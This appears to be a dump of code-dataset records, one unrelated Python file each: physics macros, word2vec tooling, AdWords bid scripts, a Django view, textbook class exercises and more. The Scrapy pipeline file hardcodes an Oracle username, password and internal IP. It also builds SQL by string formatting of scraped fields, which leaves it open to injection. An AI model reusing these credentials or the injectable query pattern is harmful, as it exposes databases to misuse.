1)[1].split(\".\")[0] + \".json\"\n\n commandGraph = graph + workFolderKaon + \" \" + PT + \" \" + iFile + \" -b\"\n commandFit = fit + workFolderKaon + \" \" + GraphFile + \" \" + KaonAlicePT + \" -b\"\n commandCHI = chi + workFolderKaon + \" \" + str(2) + \" \" + EvalGraphFile + \" \" + iFile + \" -b\" # 1 = PION\n \n os.system(commandGraph) \n os.system(commandFit) \n os.system(commandCHI) \n\n os.system(writeToTree + \" kaon\") \n \n for iFile in FILES3:\n\n GraphFile = workFolderProton + \"graph_\" + iFile.rsplit('/', 1)[1].split(\".\")[0] + \".root\"\n EvalGraphFile = workFolderProton + \"eval_fit_graph_\" + iFile.rsplit('/', 1)[1].split(\".\")[0] + \".json\"\n\n commandGraph = graph + workFolderProton + \" \" + PT + \" \" + iFile + \" -b\"\n commandFit = fit + workFolderProton + \" \" + GraphFile + \" \" + ProtonAlicePT + \" -b\"\n commandCHI = chi + workFolderProton + \" \" + str(3) + \" \" + EvalGraphFile + \" \" + iFile + \" -b\" # 1 = PION\n \n os.system(commandGraph) \n os.system(commandFit) \n os.system(commandCHI) \n\n os.system(writeToTree + \" proton\") \n \n\nmain()\n","sub_path":"RunGrid-Cent05/interpolation/do_macros_05.py","file_name":"do_macros_05.py","file_ext":"py","file_size_in_byte":4386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"341744618","text":"import sys\nimport os\nimport logging\nimport pathlib\nimport numpy as np\nimport pdb\nfrom gensim.models import word2vec\nimport tensorflow as tf\nfrom tensorflow.contrib.tensorboard.plugins import projector\nimport gensim\n\n# def save_seg_data(brc_data, tar_dir):\n# \"\"\"\n# 将问句和原文的token以空格为间隔拼接,写到segmented_dir文件夹中,对应结果后缀为.seg\n# :param brc_data:\n# :param tar_dir:\n# :return:\n# \"\"\"\n# # print('Converting ' + file)\n# # fin = open(file, encoding='utf8')\n# out_file = os.path.join(tar_dir, 'train_set.seg')\n# with open(out_file, 'w', encoding='utf8') as ftrain:\n# for sample in brc_data.train_set:\n# ftrain.write(' '.join(sample['segmented_question']) + '\\n')\n# for passage in sample['passages']:\n# ftrain.write(' '.join(passage['passage_tokens']) + '\\n')\n# del sample\n# ftrain.close()\n#\n# out_file = os.path.join(tar_dir, 'dev_set.seg')\n# with open(out_file, 'w', encoding='utf8') as fdev:\n# for sample in brc_data.dev_set:\n# fdev.write(' '.join(sample['segmented_question']) + '\\n')\n# for passage in sample['passages']:\n# fdev.write(' '.join(passage['passage_tokens']) + '\\n')\n# del sample\n# fdev.close()\n#\n# out_file = os.path.join(tar_dir, 'test_set.seg')\n# with open(out_file, 'w', encoding='utf8') as ftest:\n# for sample in brc_data.test_set:\n# ftest.write(' '.join(sample['segmented_question']) + '\\n')\n# for passage in sample['passages']:\n# ftest.write(' '.join(passage['passage_tokens']) + '\\n')\n# del sample\n# ftest.close()\n\n\ndef pre_train(segmented_dir, embed_size):\n \"\"\"\n 根据训语料训练词向量。或者可以考虑全部语料加上百度知道的数据集??\n :param brc_data:\n :param segmented_dir:\n :return:\n \"\"\"\n\n sys.path.append('..')\n # 将原始数据的分词结果进行保存\n # save_seg_data(brc_data, segmented_dir)\n\n program = os.path.basename(sys.argv[0])\n logger = logging.getLogger(program)\n logging.basicConfig(format='%(asctime)s: %(levelname)s: %(message)s')\n logging.root.setLevel(level=logging.INFO)\n logger.info(\"running %s\" % ' '.join(sys.argv))\n\n # 这里的语料是被预处理成多个结果PathLineSentences可以支持多个大文件,对内存很友好。\n # 如果语料是单个大文件的话,建议使用LineSentences(file)这个类加载训练语料,同样内存友好。\n # 默认embed_size=300\n model = word2vec.Word2Vec(word2vec.PathLineSentences(segmented_dir), size=embed_size, min_count=2, workers=12, iter=10)\n # 保存模型\n model.save(os.path.join(segmented_dir, 'w2v_dic.data'))\n with open(os.path.join(segmented_dir, 'w2v_dic.data'), 'w', encoding='utf-8') as f:\n for word in model.wv.vocab:\n f.write(word + ' ')\n f.write(' '.join(list(map(str, model[word]))))\n f.write('\\n')\n f.close()\n\n# 衡量预训练的效果\ndef check_word2vec():\n \"\"\"\n\n :return:\n \"\"\"\n #\n model = gensim.models.KeyedVectors.load_word2vec_format('./w2v_dic.data', binary=False, unicode_errors='ignore')\n val = model.wv.vocab\n index2word = model.index2word\n vectors = model.vectors\n print(index2word[2000])\n print(model.most_similar('喷子'))\n # model.most_similar(positive=['woman', 'king'], negative=['man'], topn=1)\n\n#gensim.scripts.word2vec2tensor\ndef gen_metadata_for_tensorboard():\n \"\"\"\n 为了使用tensorboard,需要将已经训练好的词向量做处理.\n 主要做的是将词嵌入以tf变量保存\n\n 运行完程序后:\n tensorboard --logdir=metadata_dir\n\n 已测试通过,正常使用\n :return: \n \"\"\"\n from tqdm import tqdm\n word2vec_path = \"\"\n word2vec_name = \"\"\n save_metadata_dir = \"\"\n word2vec_file = os.path.join(word2vec_path, word2vec_name)\n with open(word2vec_file, 'r') as f:\n header = f.readline()#词典大小 词向量维度\n vocab_size, vector_size = map(int, header.split())\n words, embeddings = [], []\n for _ in tqdm(range(vocab_size)):\n word_list = f.readline().split(' ')\n word = word_list[0]\n vector = word_list[1:]\n words.append(word)\n embeddings.append(np.array(vector))\n\n # 将词向量转为tensorboard需要的格式\n with tf.Session() as sess:\n # tf.assign():这里是一个将具体数值(即,词向量矩阵)赋值给tf Variable的例子:\n embed_martix = tf.Variable([0.0], name='embedding')\n place = tf.placeholder(tf.float32, shape=[len(words), vector_size])\n set_x = tf.assign(embed_martix, place, validate_shape=False)\n sess.run(tf.global_variables_initializer())\n sess.run(set_x, feed_dict={place: embeddings})\n\n # # 需要保存一个metadata文件,给词典里每一个词分配一个身份\n with open(os.path.join(save_metadata_dir, \"metadata.tsv\"), 'w') as f:\n for word in tqdm(words):\n f.write(word + '\\n')\n\n saver = tf.train.Saver()\n save_path = saver.save(sess, \"model_dir/model.ckpt\")\n print(\"Model saved in path: %s\" % save_path)\n # 写 TensorFlow summary\n summary_writer = tf.summary.FileWriter(save_metadata_dir, sess.graph)\n config = projector.ProjectorConfig()\n embedding_conf = config.embeddings.add()\n embedding_conf.tensor_name = 'embedding'\n embedding_conf.metadata_path = 'metadata.tsv'#注意这里的路径,否则可能出现如下错误\n #\"/data/liujiepeng/NLP/MachineComprehension/DuReader/data/DuReader2.0/segmented/metadata_dir/./metadata_dir/metadata.tsv\" not found, or is not a file\n projector.visualize_embeddings(summary_writer, config)\n\n # 保存模型\n # word2vec参数的单词和词向量部分分别保存到了metadata和ckpt文件里面\n saver = tf.train.Saver()\n saver.save(sess, os.path.join(save_metadata_dir, \"model.ckpt\"))\n\n\n\ndef gen_tensorboard_from_w2vdata():\n \"\"\"\n 将已有的词向量转为tensorboard可渲染的数据。\n 主要是生成模型文件(包含各个点信息)和metadata文件(包含各个点的label信息)。\n 已测试,正常使用\n :return:\n \"\"\"\n model_path = \"\"\n model_name = \"\"\n model = gensim.models.KeyedVectors.load_word2vec_format('./w2v_dic.data', binary=False, unicode_errors='ignore')\n max_size = len(model.wv.vocab)#为何减去1??\n vocab_size = len(model.vocab)\n print(\"max_size=\", max_size)\n print(\"vocab_size=\", vocab_size)\n print(\"model.vector_size=\", model.vector_size)\n w2v = np.zeros((max_size, model.vector_size))\n # 保存词典\n path = \"tensorboard\"\n with open(os.path.join(path, \"metadata.tsv\"), \"w+\", encoding='utf-8') as file_metadata:\n for i, word in enumerate(model.wv.index2word[:max_size]):\n w2v[i] = model.wv[word]\n file_metadata.write(word + \"\\n\")\n\n sess = tf.InteractiveSession()\n with tf.device(\"/cpu:0\"):\n embedding = tf.Variable(w2v, trainable=False, name=\"embedding\")#存储embedding\n sess.run(tf.global_variables_initializer())\n\n saver = tf.train.Saver()\n writer = tf.summary.FileWriter(path, sess.graph)\n config = projector.ProjectorConfig()\n embed = config.embeddings.add()\n embed.tensor_name = \"embedding\"#注意这里的名字要与上述的变量一致\n embed.metadata_path = \"metadata.tsv\"\n projector.visualize_embeddings(writer, config)\n saver.save(sess, path + \"/model.ckpt\", global_step=max_size)\n\n\ndef word2vec_visualize():\n \"\"\"\n\n 测试通过,可以正常使用\n :return:\n \"\"\"\n model_path = \"./w2v_dic.data\"\n output_path = \"./metadata_dir\"\n model = gensim.models.KeyedVectors.load_word2vec_format(model_path)\n pathlib.Path(output_path).mkdir(parents=True, exist_ok=True)\n meta_file = \"metadata.tsv\"\n placeholder = np.zeros((len(model.wv.index2word), model.vector_size))\n\n with open(os.path.join(output_path, meta_file), 'wb') as file_metadata:\n for i, word in enumerate(model.wv.index2word):\n placeholder[i] = model[word]\n if word == '':\n print(\"Emply Line, should replecaed by any thing else, or will cause a bug of tensorboard\")\n file_metadata.write(\"{0}\".format('').encode('utf-8') + b'\\n')\n else:\n file_metadata.write(\"{0}\".format(word).encode('utf-8') + b'\\n')\n\n # define the model without training\n sess = tf.InteractiveSession()\n\n embedding = tf.Variable(placeholder, trainable=False, name='metadata')\n tf.global_variables_initializer().run()\n\n saver = tf.train.Saver()\n writer = tf.summary.FileWriter(output_path, sess.graph)\n\n # adding into projector\n config = projector.ProjectorConfig()\n embed = config.embeddings.add()\n embed.tensor_name = 'metadata'\n embed.metadata_path = meta_file\n\n # Specify the width and height of a single thumbnail.\n projector.visualize_embeddings(writer, config)\n saver.save(sess, os.path.join(output_path, 'metadata.ckpt'))\n print('Run `tensorboard --logdir={0}` to run visualize result on tensorboard'.format(output_path))\n\nif __name__ == '__main__':\n check_word2vec()","sub_path":"utils/pretrain_embedding.py","file_name":"pretrain_embedding.py","file_ext":"py","file_size_in_byte":9426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"185133779","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: https://docs.scrapy.org/en/latest/topics/item-pipeline.html\nimport cx_Oracle\n\n\nclass HnPipeline(object):\n def __init__(self):\n pass\n\n def open_spider(self, spider):\n self.db = cx_Oracle.connect('idg_baochi/IdgBaochi2019@10.193.79.94/orclpdb1', encoding=\"UTF-8\",\n nencoding=\"UTF-8\")\n\n def close_spider(self, spider):\n self.db.close()\n\n def process_item(self, item, spider):\n cursor = self.db.cursor()\n cursor.setinputsizes(content=cx_Oracle.CLOB)\n sql = \"INSERT INTO news(id,\\\n title, publisher, publish_date, province,link,description,content,num_like,num_share, tags, topic) \\\n VALUES ( '%s','%s', '%s', TO_DATE('%s', 'yyyy/mm/dd hh24:mi:ss'), '%s' , '%s' , '%s' , :content, %d, %d, '%s', '%s')\" % \\\n (str(item[\"id\"]), str(item[\"title\"]), str(item[\"publisher\"]), str(item[\"publish_date\"]),\n str(item[\"province\"]),\n str(item[\"url\"]), str(item[\"description\"]), item[\"num_like\"], item[\"num_share\"],\n item[\"tags\"],item[\"topic\"])\n try:\n cursor.execute(sql, content=item[\"content\"])\n self.db.commit()\n except Exception as e:\n print(e)\n print(item)\n self.db.rollback()\n finally:\n cursor.close()\n return item\n","sub_path":"hn/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":1524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"328728293","text":"\"\"\"Main executable of the WeatherStation simulator.\"\"\"\nimport asyncio\nimport json\nfrom lsst.ts import weatherstation\n\nsimulator_config_path = '/home/saluser/config/config.json'\n\nasync def main():\n with open(simulator_config_path) as f:\n simulator_config = json.loads(f.read())\n\n if 'WeatherStation' in simulator_config.keys():\n awaitables = []\n for weatherstation_config in simulator_config['WeatherStation']:\n if weatherstation_config['source'] == 'command_sim':\n salindex = None\n if 'index' in weatherstation_config:\n salindex = weatherstation_config['index']\n print('WeatherStation csc | Launching salindex = {}'.format(salindex))\n csc = weatherstation.csc.CSC(salindex, simulation_mode=True)\n awaitables.append(csc.done_task)\n await asyncio.wait(awaitables)\n\nasyncio.run(main())","sub_path":"csc_sim/weatherstation.py","file_name":"weatherstation.py","file_ext":"py","file_size_in_byte":921,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"317131941","text":"from googleads import adwords\r\n\r\nPAGE_SIZE = 100\r\nclient = adwords.AdWordsClient.LoadFromStorage()\r\n\r\n\r\ndef main():\r\n # Initialize appropriate service.\r\n campaign_service = client.GetService('CampaignService', version='v201809')\r\n\r\n # Construct selector and get all campaigns.\r\n offset = 0\r\n selector = {\r\n 'fields': ['Id'],\r\n 'paging': {\r\n 'startIndex': str(offset),\r\n 'numberResults': str(PAGE_SIZE)\r\n }\r\n }\r\n\r\n more_pages = True\r\n while more_pages:\r\n page = campaign_service.get(selector)\r\n\r\n # Display results.\r\n if 'entries' in page:\r\n for campaign in page['entries']:\r\n print(campaign)\r\n print(\"***********\")\r\n # print('Campaign with id \"%s\", name \"%s\", and status \"%s\" was '\r\n # 'found.' % (campaign['id'], campaign['name'],\r\n # campaign['status']))\r\n else:\r\n print('No campaigns were found.')\r\n offset += PAGE_SIZE\r\n selector['paging']['startIndex'] = str(offset)\r\n more_pages = offset < int(page['totalNumEntries'])\r\n\r\n\r\n# def update_campaign_labels(campaign_id,operation, labels):\r\n# # Initialize appropriate service.\r\n# campaign_service = client.GetService('CampaignService', version='v201809')\r\n#\r\n# # Construct operations and update campaign.\r\n#\r\n# label_service = client.GetService('LabelService',version='v201809')\r\n# label_id=None\r\n# try:\r\n# LabelOperation=[{\r\n# 'operator': operation,\r\n# 'operand': {'xsi_type':'TextLabel','name': labels}\r\n# }]\r\n# response=label_service.mutate(LabelOperation)\r\n# label_id=response['value'][0]['id']\r\n# print(response['value'][0]['id'])\r\n# except Exception as e:\r\n# print(e)\r\n# print(\"Sorry Try again.\")\r\n# a=CampaignPerformanceReportModel.objects.get(Labels__icontains=labels).LabelIds\r\n# print(a)\r\n# else:\r\n# operations = [{\r\n# 'operator': operation,\r\n# 'operand': {\r\n# 'campaignId': campaign_id,\r\n# 'labelId': label_id\r\n# }\r\n# }]\r\n# result=campaign_service.mutateLabel(operations)\r\n# #print(result)\r\n\r\ndef setCPCbids(id, bid_micro_amount):\r\n # Initialize appropriate service.\r\n ad_group_service = client.GetService('AdGroupService', version='v201809')\r\n\r\n # Construct operations and update an ad group.\r\n operations = [{\r\n 'operator': 'SET',\r\n 'operand': {\r\n 'id': id\r\n }\r\n }]\r\n\r\n if bid_micro_amount:\r\n operations[0]['operand']['biddingStrategyConfiguration'] = {\r\n 'bids': [{\r\n 'xsi_type': 'CpcBid',\r\n 'bid': {\r\n 'microAmount': bid_micro_amount,\r\n }\r\n }]\r\n }\r\n\r\n ad_group_service.mutate(operations)\r\n\r\n\r\ndef setCPMbids(id, bid_micro_amount):\r\n # Initialize appropriate service.\r\n ad_group_service = client.GetService('AdGroupService', version='v201809')\r\n\r\n # Construct operations and update an ad group.\r\n operations = [{\r\n 'operator': 'SET',\r\n 'operand': {\r\n 'id': id\r\n }\r\n }]\r\n\r\n if bid_micro_amount:\r\n operations[0]['operand']['biddingStrategyConfiguration'] = {\r\n 'bids': [{\r\n 'xsi_type': 'CpmBid',\r\n 'bid': {\r\n 'microAmount': bid_micro_amount,\r\n }\r\n }]\r\n }\r\n\r\n ad_group_service.mutate(operations)\r\n\r\n\r\ndef setCPAbids(id, bid_micro_amount):\r\n # Initialize appropriate service.\r\n ad_group_service = client.GetService('AdGroupService', version='v201809')\r\n\r\n # Construct operations and update an ad group.\r\n operations = [{\r\n 'operator': 'SET',\r\n 'operand': {\r\n 'id': id\r\n }\r\n }]\r\n\r\n if bid_micro_amount:\r\n operations[0]['operand']['biddingStrategyConfiguration'] = {\r\n 'bids': [{\r\n 'xsi_type': 'CpaBid',\r\n 'bid': {\r\n 'microAmount': bid_micro_amount,\r\n }\r\n }]\r\n }\r\n\r\n ad_group_service.mutate(operations)\r\n\r\n\r\ndef increaseCPCbids():\r\n temp_list = set()\r\n # Initialize appropriate service.\r\n ad_group_bid_modifier_service = client.GetService(\r\n 'AdGroupBidModifierService', version='v201809')\r\n\r\n # Get all ad group bid modifiers for the campaign.\r\n selector = {\r\n 'fields': ['CampaignName', 'CampaignId', 'AdGroupId', 'BidModifier', 'Id'],\r\n \"predicates\": {\r\n \"field\": \"CampaignStatus\",\r\n \"operator\": \"IN\",\r\n \"values\": [\r\n \"ENABLED\",\r\n \"PAUSED\",\r\n ]\r\n },\r\n\r\n }\r\n\r\n # Set initial values.\r\n # offset, page = 0, {}\r\n # more_results = True\r\n\r\n # while more_results:\r\n page = ad_group_bid_modifier_service.get(selector)\r\n print(page)\r\n #\r\n # if page['entries']:\r\n # # break\r\n # for modifier in page['entries']:\r\n # print(modifier)\r\n # value = (modifier['bidModifier'] if 'bidModifier' in modifier\r\n # else 'unset')\r\n # # print('Campaign ID %s, AdGroup ID %s, Criterion ID %s has ad group '\r\n # # 'level modifier: %s' %\r\n # # (modifier['campaignId'], modifier['adGroupId'],\r\n # # modifier['criterion']['id'], value))\r\n # temp_list.add(modifier['campaignId'])\r\n #\r\n # # Increment values to request the next page.\r\n # # offset += PAGE_SIZE\r\n # # selector['paging']['startIndex'] = str(offset)\r\n # else:\r\n # print('No ad group bid modifiers returned.')\r\n # # more_results = int(page['totalNumEntries']) > offset\r\n # print(\"campaign ids: \", temp_list)\r\n\r\n\r\nif __name__ == '__main__':\r\n adwords_client = adwords.AdWordsClient.LoadFromStorage(\"/home/oem/Documents/va8ive/googleadwordssamad/google-ads.yaml\")\r\n # main(adwords_client)\r\n # update_campaign_labels('6454212146', 'AD-D', 'Usa')\r\n setCPCbids('75822879265', 50000000)\r\n setCPMbids('75822879265', 50000000)\r\n setCPAbids('75822879265', 50000000)\r\n increaseCPCbids()\r\n\r\n# Campaign ID 2030405009, AdGroup ID 72728417180, Criterion ID 30000 has ad group level modifier: None\r\n","sub_path":"googleadwordssamad/Adwords-Automation/get_campaign.py","file_name":"get_campaign.py","file_ext":"py","file_size_in_byte":6451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"645967601","text":"from mercurial.ui import ui as hgui\nfrom mercurial.hg import repository\n\ndef extract_stats(path, seen=None):\n if seen is None:\n seen = set()\n\n ui = hgui()\n repo = repository(ui, path)\n\n for rev in repo:\n ctx = repo[rev]\n if ctx.hex() in seen:\n continue\n\n yield (ctx.hex(), \n [ctx.user()], \n ctx.date(), \n ctx.description(),\n [p.hex() for p in ctx.parents()])\n","sub_path":"vcsstatslib/vcs/hg.py","file_name":"hg.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"389800839","text":"#!usr/bin/python\n#-*- coding: utf-8 -*-\n\"\"\"\nРозробити функцію count_holes(n),\nяка приймає 1 аргумент -- ціле число або рядок, який містить ціле число,\nта повертає ціле число -- кількість \"отворів\" у десятковому записі цього числа друкованими цифрами (вважати, що у \"4\" та у \"0\" по одному отвору), або рядок ERROR, якщо переданий аргумент не задовольняє вимогам: є дійсним або взагалі не числом.\n\"\"\"\ndef count_holes(n):\n\tdict_num = {'-': 0, '0': 1, '1': 0, '2': 0, '3': 0, '4': 1, '5': 0, '6': 1, '7': 0, '8': 2, '9': 1}\n\tstr_num = '-0123456789'\n\tcounter = 0\n\tif len(str(n)) != 0:\n\t\tfor k in str(n):\n\t\t\tif k not in str_num:\n\t\t\t\treturn 'ERROR'\t\n\t\ta = str(int(n))\n\t\tfor i in a:\n\t\t\tcounter = counter + dict_num[i]\n\telse: \n\t\treturn 'ERROR'\n\tif type(n) == float:\n\t\treturn 'ERROR'\n\treturn counter\n","sub_path":"Prometheus/lect6_1.py","file_name":"lect6_1.py","file_ext":"py","file_size_in_byte":1044,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"629678336","text":"import json\nimport collections\nimport pprint\n\nfrom django.shortcuts import render, get_object_or_404\nfrom django.contrib import messages\n\nfrom linker.forms import AddDataForm, AddPathwayForm\nfrom linker.models import Analysis, AnalysisData\nfrom linker.reactome import get_species_dict\nfrom linker.views.functions import reactome_mapping, save_analysis\nfrom linker.constants import GENOMICS, PROTEOMICS, METABOLOMICS, REACTIONS, PATHWAYS, \\\n DataRelationType, COMPOUND_DATABASE_CHEBI, COMPOUND_DATABASE_KEGG\n\n\ndef settings(request, analysis_id):\n analysis = get_object_or_404(Analysis, pk=analysis_id)\n species_dict = get_species_dict()\n\n # here we also set the species field to the first species of this analysis\n form = AddDataForm()\n inv_map = {v: k for k, v in species_dict.items()}\n first_species = analysis.metadata['species_list'][0]\n idx = inv_map[first_species]\n form.fields['species'].initial = idx\n\n context = {\n 'analysis_id': analysis.pk,\n 'form': form,\n }\n return render(request, 'linker/settings.html', context)\n\n\ndef add_data(request, analysis_id):\n if request.method == 'POST':\n analysis = get_object_or_404(Analysis, pk=analysis_id)\n species_dict = get_species_dict()\n form = AddDataForm(request.POST, request.FILES)\n if form.is_valid():\n database_id = form.cleaned_data['database_id']\n species = form.cleaned_data['species']\n species_list = [species_dict[species]]\n data_type = int(form.cleaned_data['data_type'])\n\n if data_type == GENOMICS:\n genes_str = get_formatted_data(analysis.metadata, 'genes_str', database_id)\n proteins_str = get_formatted_data(analysis.metadata, 'proteins_str', None)\n compounds_str = get_formatted_data(analysis.metadata, 'compounds_str', None)\n elif data_type == PROTEOMICS:\n genes_str = get_formatted_data(analysis.metadata, 'genes_str', None)\n proteins_str = get_formatted_data(analysis.metadata, 'proteins_str', database_id)\n compounds_str = get_formatted_data(analysis.metadata, 'compounds_str', None)\n elif data_type == METABOLOMICS:\n genes_str = get_formatted_data(analysis.metadata, 'genes_str', None)\n proteins_str = get_formatted_data(analysis.metadata, 'proteins_str', None)\n compounds_str = get_formatted_data(analysis.metadata, 'compounds_str', database_id)\n\n metabolic_pathway_only = True\n results = reactome_mapping(request, genes_str, proteins_str, compounds_str, COMPOUND_DATABASE_KEGG,\n species_list, metabolic_pathway_only)\n\n # update analysis data\n counts = collections.defaultdict(int)\n for k, r in DataRelationType:\n analysis_data = AnalysisData.objects.filter(analysis=analysis, data_type=k).first()\n if analysis_data is not None:\n new_json_data = json.loads(results[k])\n for item in new_json_data: # add the new data\n if item not in analysis_data.json_data:\n analysis_data.json_data.append(item)\n counts[r] += 1\n analysis_data.save()\n print('Updated analysis data', analysis_data.pk, 'for analysis', analysis.pk)\n\n # update species in analysis metadata\n species_list = list(set(analysis.get_species_list() + species_list))\n analysis.metadata['species_list'] = species_list\n analysis.save()\n\n count = 1\n print('Updated analysis', analysis.pk, '(', species_list, ')')\n messages.success(request, 'Add new data successful.', extra_tags='primary')\n s = pprint.pformat(dict(counts))\n messages.add_message(request, messages.DEBUG, 'Total records updated {0}'.format(s), extra_tags='secondary')\n else:\n messages.warning(request, 'Add new data failed.')\n\n return settings(request, analysis_id)\n\n\ndef get_formatted_data(metadata, key, database_id):\n if len(metadata[key]) == 0: # nothing stored in the metadata\n header_line = 'identifier'\n if database_id is not None:\n new_str = header_line + '\\n' + database_id\n else:\n new_str = header_line + '\\n' + ''\n\n else: # we found something\n header_line = metadata[key].splitlines()[0]\n toks = header_line.split(',')\n if database_id is not None:\n vals = [database_id] + [','] * (len(toks)-1)\n assert(len(toks) == len(vals))\n new_str = header_line + '\\n' + ''.join(vals)\n else:\n new_str = header_line + '\\n'\n return new_str","sub_path":"web_omics/linker/views/settings_view.py","file_name":"settings_view.py","file_ext":"py","file_size_in_byte":4837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"639960263","text":"from menu import Menu\n\n\ndef main():\n \"\"\"\n Creates a tamagotchi and let's the User take care and interact with it.\n \"\"\"\n Menu.welcome()\n Menu.prompt_user()\n number_input = int(input())\n if number_input == 1:\n Menu.create_tamagochi()\n else:\n print(\"Sorry to hear that...\")\n exit()\n while True:\n Menu.show_options()\n option_input = int(input())\n if option_input == 1:\n Menu.show_status()\n elif option_input == 2:\n print(\"\\nWhich food would you like to give?\")\n print(\"1. Apple\")\n print(\"2. Orange\")\n print(\"3. Kiwi\\n\")\n food_input = int(input())\n Menu.feed_food(food_input)\n elif option_input == 3:\n Menu.play()\n elif option_input == 4:\n Menu.give_medicine()\n else:\n print(\"Invalid Input! Try again!\")\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"Assignments/assignment1/driver.py","file_name":"driver.py","file_ext":"py","file_size_in_byte":946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"12456746","text":"# Просто зверюшка\n# Демонстрирует простейшие класс и объект\nclass Critter(object):\n \"\"\"Виртуальный питомец\"\"\"\n def talk(self):\n print(\"Привет. Я зверюшка - экземпляр класса\")\n\n\ncrit = Critter()\ncrit.talk()\n\n# Зверюшка с конструктором\n# Демонстрирует\nclass Critter(object):\n \"\"\"Виртуальный питомец\"\"\"\n def __init__(self):\n print(\"Появилась новая зверюшка\")\n def talk(self):\n print(\"\\nПpивeт. Я зверюшка - экземпляр класса C r i t t e r . \" )\n# основная\ncritl = Critter()\ncrit2 = Critter()\ncritl.talk()\ncrit2.talk()\n\n# Зверюшка с атрибутами\n# Демонстрирует создание атрибутов объекта и доступ к ним\nclass Critter(object):\n \"\"\"Виртуальный питомец\"\"\"\n def __init__(self, name):\n print(\"Появилась на свет новая зверюшка\")\n self.name = name\n def __str__(self):\n rep = \"Обьект класса Crittre\\n\"\n rep += \"имя: \" + self.name + \"\\n\"\n return rep\n def talk(self):\n print(\"Привет. Меня зовут\", self.name, \"\\n\")\n \ncrit1 = Critter(\"Бобик\")\ncrit1.talk()\ncrit2 = Critter(\"Мурзик\")\ncrit2.talk()\nprint(\"Вивод обьекта crit1 на экран:\")\nprint(crit1)\nprint(\"Непосредственный доступ к атрибуту crit1.name\")\nprint(crit1.name)\n\n# Классово верная зверюшк��\n# Демонстрирует атрибуты класса и статические методы\nclass Critter(object):\n \"\"\"Виртуальный питомец\"\"\"\n total = 0\n @staticmethod\n def status():\n print(\"\\nBcero зверюшек сейчас\" ,Critter.total)\n def __init__ (self, name):\n print(\"Появилась на свет новая зверюшка!\")\n self.name = name\n Critter.total += 1\n# основная часть\nprint(\"Haxoжy значение атрибута класса Critter.total :\", end=\" \")\nprint(Critter.total)\nprint(\"\\nCoздaю зверюшек.\")\ncritl = Critter(\"зверюшка 1\")\ncrit2 = Critter(\"зверюшка 2\")\ncritЗ= Critter(\"зверюшка 3\")\nCritter .status()\nprint(\"\\nOбpaщaюcь к атрибуту класса через объект:\")\nprint(critl.total)\n\n\n# Закрытая зверюшка\n# Демонстрирует закрытые переменные и методы class Critter(object):\n\nclass Critter1(object):\n \"\"\"Виртуальный питомец\"\"\"\n def __init__(self, name, mood):\n print(\"Появилась на свет новая зверюшка\")\n self.name = name # открытый атрибут\n self.__mood = mood # закрытый атрибут\n def talk(self):\n print(\"\\nМеня зовут\", self.name)\n print(\"Сейчас я чувствую себя\", self.__mood,\"\\n\")\n def __private_method(self):\n print(\"Это закрытый метод.\")\n def public_method(self):\n print(\"Это открытый метод\")\n self.__private_method()\n \n#основная часть\ncreature = Critter1(\"Бобик\",\"прекрасно\")\ncreature.talk()\ncreature.public_method()\ncreature._Critter1__private_method()\nprint(creature.name)\n\n\n# Зверюшка со свойствами\n# Демонстрирует свойства\nclass Critter(object):\n \"\"\"Виртуальный питомец\"\"\"\n def __init__(self, name):\n print(\"Появилась на свет новая зверюшка!\")\n self.__name = name\n @property # свойство - обьект с методами которые позволяют косвенно\n # обращатся к атрибутам и зачастую в чем-либо ограничивают такой косвенный доступ\n def name(self):\n return self.__name\n @name.setter # декоратор обращаясь к которому я говорю что метод далее\n # устанавливает новое значение свойства name метод сеттер имеет тоже имя что и свойство\n def name(self, new_name):\n if new_name == \"\":\n print(\"Имя зверюшки не может быть пустой строкой\")\n else:\n self.__name = new_name\n print(\"Имя успешно изменено\")\n def talk(self):\n print(\"\\nПривет меня зовут\", self.name)\n\ncreit = Critter(\"бобик\")\ncreit.talk()\nprint(\"Мою зверюшку зовут\", creit.name)\nprint(\"Попробую изменить имя на мурзик\")\ncreit.name = \"Мурзик\"\nprint(\"Мою зверюшку зовут\", creit.name)\nprint(\"Попробую изменить имя на пустую строку\")\ncreit.name = \"\"\nprint(\"Мою зверюшку зовут\", creit.name)\n","sub_path":"Майкл Доусон \"Программируем на Python\"/Unit8.py","file_name":"Unit8.py","file_ext":"py","file_size_in_byte":5166,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"462188664","text":"#!/usr/bin/env python3\nimport rospy\nfrom nav_msgs.msg import Odometry\nimport tf2_ros\nimport tf2_geometry_msgs\nimport geometry_msgs.msg\n\n\ndef odom_received(odom):\n global tfBroadcaster\n global tfBuffer\n global odom_publisher\n global counter\n\n base_link_to_zed_left_camera_optical_frame = tfBuffer.lookup_transform('base_link', 'zed_left_camera_optical_frame', rospy.Time())\n\n translation = geometry_msgs.msg.Vector3Stamped()\n translation.header.frame_id = 'zed_left_camera_optical_frame'\n translation.vector = odom.pose.pose.position\n translation_base_link = tf2_geometry_msgs.do_transform_vector3(translation, base_link_to_zed_left_camera_optical_frame)\n\n rotation_vector = geometry_msgs.msg.Vector3Stamped()\n rotation_vector.header.frame_id = 'zed_left_camera_optical_frame'\n rotation_vector.vector.x = odom.pose.pose.orientation.x\n rotation_vector.vector.y = odom.pose.pose.orientation.y\n rotation_vector.vector.z = odom.pose.pose.orientation.z\n rotation_vector_base_link = tf2_geometry_msgs.do_transform_vector3(rotation_vector, base_link_to_zed_left_camera_optical_frame)\n\n odom_pose_base_link = 